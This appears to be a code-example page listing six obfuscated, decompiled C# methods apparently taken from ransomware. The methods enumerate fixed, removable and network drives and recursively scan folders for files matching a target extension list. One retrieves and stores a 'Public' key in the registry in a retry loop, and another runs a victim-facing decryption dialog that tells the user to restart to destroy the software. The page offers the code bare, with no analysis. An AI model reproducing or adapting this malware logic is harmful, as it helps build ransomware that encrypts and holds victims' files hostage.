Ejemplo n.º 1
0
    public void method_23()
    {
        string text = Delegate120.smethod_0(Environment.SpecialFolder.Desktop);

        string[] array = Delegate194.smethod_0(text, "*.*");
        for (int i = 0; i < array.Length; i++)
        {
            string   string_ = array[i];
            string   text2   = Delegate195.smethod_0(string_);
            string[] array2  = this.string_6;
            for (int j = 0; j < array2.Length; j++)
            {
                string text3 = array2[j];
                if (Delegate98.smethod_1(text3, text2))
                {
                    try
                    {
                        this.method_18(string_);
                        goto IL_63;
                    }
                    catch (Exception)
                    {
                        goto IL_63;
                    }
                    break;
                }
                IL_63 :;
            }
        }
    }
Ejemplo n.º 2
0
 public void method_19(List <string> list_0, string string_7)
 {
     try
     {
         string[] array = Delegate194.smethod_0(string_7, "*.*");
         for (int i = 0; i < array.Length; i++)
         {
             string   text    = array[i];
             string   object_ = Delegate195.smethod_0(text);
             string[] array2  = this.string_6;
             for (int j = 0; j < array2.Length; j++)
             {
                 string text2 = array2[j];
                 if (Delegate98.smethod_1(text2, Delegate143.smethod_0(object_)) && !this.method_16(text))
                 {
                     list_0.Add(text);
                     this.method_17(text);
                 }
             }
         }
         string[] array3 = Delegate196.smethod_0(string_7);
         for (int k = 0; k < array3.Length; k++)
         {
             string string_8 = array3[k];
             if (!this.method_6(string_8))
             {
                 this.method_19(list_0, string_8);
             }
         }
     }
     catch (Exception object_2)
     {
         Delegate100.smethod_2(Delegate197.smethod_0(object_2));
     }
 }
Ejemplo n.º 3
0
    public bool method_12(string string_7)
    {
        bool   flag  = false;
        string text  = Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Keys");
        string text2 = (string)Delegate169.smethod_0(text, "Public", "");

        if (Delegate98.smethod_1(text2, ""))
        {
            while (!flag)
            {
                string text3 = this.method_9(49, Delegate179.smethod_0(new object[]
                {
                    ":",
                    this.int_2,
                    ":",
                    this.int_3
                }));
                string object_ = this.method_8(Delegate124.smethod_0(string_7, text3));
                if (Delegate98.smethod_0(object_, ""))
                {
                    Delegate127.smethod_0(text, "Public", object_, RegistryValueKind.String);
                    return(true);
                }
                Delegate104.smethod_0(this.int_1);
            }
            return(false);
        }
        Delegate100.smethod_2("Public already exsits");
        return(true);
    }
Ejemplo n.º 4
0
 public bool method_16(string string_7)
 {
     string[] array  = Delegate182.smethod_0(this.registryKey_0);
     string[] array2 = array;
     for (int i = 0; i < array2.Length; i++)
     {
         string text = array2[i];
         if (Delegate98.smethod_1(text, string_7))
         {
             return(true);
         }
     }
     return(false);
 }
Ejemplo n.º 5
0
    public List <string> method_5()
    {
        DriveInfo[]   array = Delegate139.smethod_0();
        List <string> list  = new List <string>();

        DriveInfo[] array2 = array;
        for (int i = 0; i < array2.Length; i++)
        {
            DriveInfo object_ = array2[i];
            if (Delegate98.smethod_1(Delegate141.smethod_0(Delegate140.smethod_0(object_)), "Fixed") || Delegate98.smethod_1(Delegate141.smethod_0(Delegate140.smethod_0(object_)), "Removable") || Delegate98.smethod_1(Delegate141.smethod_0(Delegate140.smethod_0(object_)), "Network"))
            {
                list.Add(Delegate142.smethod_0(object_));
            }
        }
        return(list);
    }
Ejemplo n.º 6
0
        public void method_2(string string_1)
        {
            Delegate104.smethod_0(5000);
            Mutex object_ = Delegate17.smethod_0();

            if (this.gclass0_0.method_13(string_1))
            {
                Delegate105.smethod_0(this.progressBar_0, ProgressBarStyle.Blocks);
                Delegate102.smethod_1(this.progressBar_0, 0);
                Delegate102.smethod_2(this.progressBar_0, this.gclass0_0.method_22());
                Delegate83.smethod_3(this.progressBar_1, false);
                string[] array = this.string_0;
                for (int i = 0; i < array.Length; i++)
                {
                    string string_2 = array[i];
                    Delegate106.smethod_0(object_);
                    if (!Delegate98.smethod_1(string_2, ""))
                    {
                        Delegate54.smethod_0(this.label_8, string_2);
                        Delegate102.smethod_3(this.progressBar_0, 1);
                        this.gclass0_0.method_21(string_2);
                        Delegate107.smethod_0(object_);
                    }
                }
                Delegate106.smethod_0(object_);
                DialogResult dialogResult = Delegate97.smethod_0("Search and decryption of the found files completed. \n\nMake sure that all important files have been decrypted! If part of the files had not been decrypted - move them to the desktop and click <<Retry>> button. \n\nOtherwise, press <<Cancel>> button - this will delete the software from this computer. Please restart your computer to completely destroy this software!", "Attention!", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation);
                if (dialogResult == DialogResult.Retry)
                {
                    this.gclass0_0.method_23();
                    this.gclass0_0.method_24();
                }
                else
                {
                    this.gclass0_0.method_24();
                }
                Delegate107.smethod_0(object_);
            }
            Delegate108.smethod_0();
        }